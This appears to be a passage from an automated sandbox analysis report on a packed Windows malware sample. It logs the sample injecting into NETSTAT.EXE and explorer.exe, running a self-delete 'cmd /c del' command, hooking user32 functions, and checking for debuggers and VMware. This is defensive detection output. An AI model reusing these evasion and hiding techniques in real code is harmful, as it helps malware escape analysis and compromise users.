Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: netstat.pdbGCTL source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\def056c534cc4ea39c4345526c5ff6fa\Loader\Loader\Release\p2wf97kzy.pdb source: Y4U48592345670954.exe, 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp, yow0w7y8ovyw.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: Y4U48592345670954.exe, 00000000.00000003.652459500.000000001EF70000.00000004.00000001.sdmp, Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y4U48592345670954.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Unpacked PE file: 2.2.Y4U48592345670954.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, | 0_2_00401FDC
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_004048E9 push ebp; retf | 2_2_004048EA
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00417138 push ecx; iretd | 2_2_00417150
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0040993B pushad ; retf | 2_2_0040993C
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_004169DF push eax; iretd | 2_2_004169E0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0041CEB5 push eax; ret | 2_2_0041CF08
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0041CF6C push eax; ret | 2_2_0041CF72
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0041CF02 push eax; ret | 2_2_0041CF08
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0041CF0B push eax; ret | 2_2_0041CF72
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BCD0D1 push ecx; ret | 2_2_00BCD0E4
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_004048E9 push ebp; retf | 2_1_004048EA
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_00417138 push ecx; iretd | 2_1_00417150
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_0040993B pushad ; retf | 2_1_0040993C
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_004169DF push eax; iretd | 2_1_004169E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038BD0D1 push ecx; ret | 4_2_038BD0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D548E9 push ebp; retf | 4_2_00D548EA
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D669DF push eax; iretd | 4_2_00D669E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D5993B pushad ; retf | 4_2_00D5993C
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D67138 push ecx; iretd | 4_2_00D67150
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D6CEB5 push eax; ret | 4_2_00D6CF08
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D6CF6C push eax; ret | 4_2_00D6CF72
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D6CF02 push eax; ret | 4_2_00D6CF08
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D6CF0B push eax; ret | 4_2_00D6CF72
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | File created: C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE1
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 0000000000D598E4 second address: 0000000000D598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 0000000000D59B5E second address: 0000000000D59B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00409A90 rdtsc | 2_2_00409A90
Source: C:\Windows\explorer.exe TID: 6616 | Thread sleep count: 39 > 30
Source: C:\Windows\explorer.exe TID: 6616 | Thread sleep time: -78000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4164 | Thread sleep time: -75000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, | 0_2_00405301
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, | 0_2_00405C94
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_004026BC FindFirstFileA, | 0_2_004026BC
Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.672700817.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.925108895.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.672700817.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000003.00000000.667233392.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.672797354.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.667233392.0000000004710000.00000004.00000001.sdmp | Binary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&f
Source: explorer.exe, 00000003.00000000.672858468.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000003.00000000.668267226.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000003.00000000.676634834.000000000FD24000.00000004.00000001.sdmp | Binary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process queried: DebugPort
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00409A90 rdtsc | 2_2_00409A90
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0040ACD0 LdrLoadDll, | 2_2_0040ACD0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_6F731000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile, | 0_2_6F731000
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, | 0_2_00401FDC
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_02841699 mov eax, dword ptr fs:[00000030h] | 0_2_02841699
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_028418B1 mov eax, dword ptr fs:[00000030h] | 0_2_028418B1
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAF0BF mov ecx, dword ptr fs:[00000030h] | 2_2_00BAF0BF
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAF0BF mov eax, dword ptr fs:[00000030h] | 2_2_00BAF0BF
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAF0BF mov eax, dword ptr fs:[00000030h] | 2_2_00BAF0BF
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h] | 2_2_00C0B8D0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C0B8D0 mov ecx, dword ptr fs:[00000030h] | 2_2_00C0B8D0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h] | 2_2_00C0B8D0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h] | 2_2_00C0B8D0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h] | 2_2_00C0B8D0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C0B8D0 mov eax, dword ptr fs:[00000030h] | 2_2_00C0B8D0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB90AF mov eax, dword ptr fs:[00000030h] | 2_2_00BB90AF
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h] | 2_2_00BA20A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h] | 2_2_00BA20A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h] | 2_2_00BA20A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h] | 2_2_00BA20A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h] | 2_2_00BA20A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA20A0 mov eax, dword ptr fs:[00000030h] | 2_2_00BA20A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B79080 mov eax, dword ptr fs:[00000030h] | 2_2_00B79080
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF3884 mov eax, dword ptr fs:[00000030h] | 2_2_00BF3884
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF3884 mov eax, dword ptr fs:[00000030h] | 2_2_00BF3884
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B758EC mov eax, dword ptr fs:[00000030h] | 2_2_00B758EC
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h] | 2_2_00B8B02A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h] | 2_2_00B8B02A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h] | 2_2_00B8B02A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8B02A mov eax, dword ptr fs:[00000030h] | 2_2_00B8B02A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h] | 2_2_00BA002D
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h] | 2_2_00BA002D
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h] | 2_2_00BA002D
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h] | 2_2_00BA002D
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA002D mov eax, dword ptr fs:[00000030h] | 2_2_00BA002D
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF7016 mov eax, dword ptr fs:[00000030h] | 2_2_00BF7016
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF7016 mov eax, dword ptr fs:[00000030h] | 2_2_00BF7016
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF7016 mov eax, dword ptr fs:[00000030h] | 2_2_00BF7016
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C32073 mov eax, dword ptr fs:[00000030h] | 2_2_00C32073
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C41074 mov eax, dword ptr fs:[00000030h] | 2_2_00C41074
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C44015 mov eax, dword ptr fs:[00000030h] | 2_2_00C44015
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C44015 mov eax, dword ptr fs:[00000030h] | 2_2_00C44015
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B90050 mov eax, dword ptr fs:[00000030h] | 2_2_00B90050
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B90050 mov eax, dword ptr fs:[00000030h] | 2_2_00B90050
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h] | 2_2_00BF51BE
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h] | 2_2_00BF51BE
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h] | 2_2_00BF51BE
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF51BE mov eax, dword ptr fs:[00000030h] | 2_2_00BF51BE
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF69A6 mov eax, dword ptr fs:[00000030h] | 2_2_00BF69A6
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA61A0 mov eax, dword ptr fs:[00000030h] | 2_2_00BA61A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA61A0 mov eax, dword ptr fs:[00000030h] | 2_2_00BA61A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C041E8 mov eax, dword ptr fs:[00000030h] | 2_2_00C041E8
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA2990 mov eax, dword ptr fs:[00000030h] | 2_2_00BA2990
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B9C182 mov eax, dword ptr fs:[00000030h] | 2_2_00B9C182
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAA185 mov eax, dword ptr fs:[00000030h] | 2_2_00BAA185
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7B1E1 mov eax, dword ptr fs:[00000030h] | 2_2_00B7B1E1
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7B1E1 mov eax, dword ptr fs:[00000030h] | 2_2_00B7B1E1
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7B1E1 mov eax, dword ptr fs:[00000030h] | 2_2_00B7B1E1
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA513A mov eax, dword ptr fs:[00000030h] | 2_2_00BA513A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA513A mov eax, dword ptr fs:[00000030h] | 2_2_00BA513A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h] | 2_2_00B94120
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h] | 2_2_00B94120
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h] | 2_2_00B94120
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B94120 mov eax, dword ptr fs:[00000030h] | 2_2_00B94120
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B94120 mov ecx, dword ptr fs:[00000030h] | 2_2_00B94120
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B79100 mov eax, dword ptr fs:[00000030h] | 2_2_00B79100
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B79100 mov eax, dword ptr fs:[00000030h] | 2_2_00B79100
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B79100 mov eax, dword ptr fs:[00000030h] | 2_2_00B79100
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7B171 mov eax, dword ptr fs:[00000030h] | 2_2_00B7B171
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7B171 mov eax, dword ptr fs:[00000030h] | 2_2_00B7B171
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7C962 mov eax, dword ptr fs:[00000030h] | 2_2_00B7C962
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B9B944 mov eax, dword ptr fs:[00000030h] | 2_2_00B9B944
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B9B944 mov eax, dword ptr fs:[00000030h] | 2_2_00B9B944
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8AAB0 mov eax, dword ptr fs:[00000030h] | 2_2_00B8AAB0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8AAB0 mov eax, dword ptr fs:[00000030h] | 2_2_00B8AAB0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAFAB0 mov eax, dword ptr fs:[00000030h] | 2_2_00BAFAB0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h] | 2_2_00B752A5
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h] | 2_2_00B752A5
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h] | 2_2_00B752A5
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h] | 2_2_00B752A5
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B752A5 mov eax, dword ptr fs:[00000030h] | 2_2_00B752A5
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAD294 mov eax, dword ptr fs:[00000030h] | 2_2_00BAD294
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAD294 mov eax, dword ptr fs:[00000030h] | 2_2_00BAD294
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA2AE4 mov eax, dword ptr fs:[00000030h] | 2_2_00BA2AE4
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA2ACB mov eax, dword ptr fs:[00000030h] | 2_2_00BA2ACB
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3EA55 mov eax, dword ptr fs:[00000030h] | 2_2_00C3EA55
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C04257 mov eax, dword ptr fs:[00000030h] | 2_2_00C04257
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB4A2C mov eax, dword ptr fs:[00000030h] | 2_2_00BB4A2C
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB4A2C mov eax, dword ptr fs:[00000030h] | 2_2_00BB4A2C
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7AA16 mov eax, dword ptr fs:[00000030h] | 2_2_00B7AA16
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7AA16 mov eax, dword ptr fs:[00000030h] | 2_2_00B7AA16
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C2B260 mov eax, dword ptr fs:[00000030h] | 2_2_00C2B260
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C2B260 mov eax, dword ptr fs:[00000030h] | 2_2_00C2B260
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B93A1C mov eax, dword ptr fs:[00000030h] | 2_2_00B93A1C
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C48A62 mov eax, dword ptr fs:[00000030h] | 2_2_00C48A62
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B75210 mov eax, dword ptr fs:[00000030h] | 2_2_00B75210
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B75210 mov ecx, dword ptr fs:[00000030h] | 2_2_00B75210
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B75210 mov eax, dword ptr fs:[00000030h] | 2_2_00B75210
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B75210 mov eax, dword ptr fs:[00000030h] | 2_2_00B75210
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B88A0A mov eax, dword ptr fs:[00000030h] | 2_2_00B88A0A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB927A mov eax, dword ptr fs:[00000030h] | 2_2_00BB927A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3AA16 mov eax, dword ptr fs:[00000030h] | 2_2_00C3AA16
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3AA16 mov eax, dword ptr fs:[00000030h] | 2_2_00C3AA16
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h] | 2_2_00B79240
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h] | 2_2_00B79240
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h] | 2_2_00B79240
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B79240 mov eax, dword ptr fs:[00000030h] | 2_2_00B79240
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA4BAD mov eax, dword ptr fs:[00000030h] | 2_2_00BA4BAD
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA4BAD mov eax, dword ptr fs:[00000030h] | 2_2_00BA4BAD
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA4BAD mov eax, dword ptr fs:[00000030h] | 2_2_00BA4BAD
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAB390 mov eax, dword ptr fs:[00000030h] | 2_2_00BAB390
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA2397 mov eax, dword ptr fs:[00000030h] | 2_2_00BA2397
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B81B8F mov eax, dword ptr fs:[00000030h] | 2_2_00B81B8F
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B81B8F mov eax, dword ptr fs:[00000030h] | 2_2_00B81B8F
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C2D380 mov ecx, dword ptr fs:[00000030h] | 2_2_00C2D380
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3138A mov eax, dword ptr fs:[00000030h] | 2_2_00C3138A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B9DBE9 mov eax, dword ptr fs:[00000030h] | 2_2_00B9DBE9
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h] | 2_2_00BA03E2
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h] | 2_2_00BA03E2
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h] | 2_2_00BA03E2
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h] | 2_2_00BA03E2
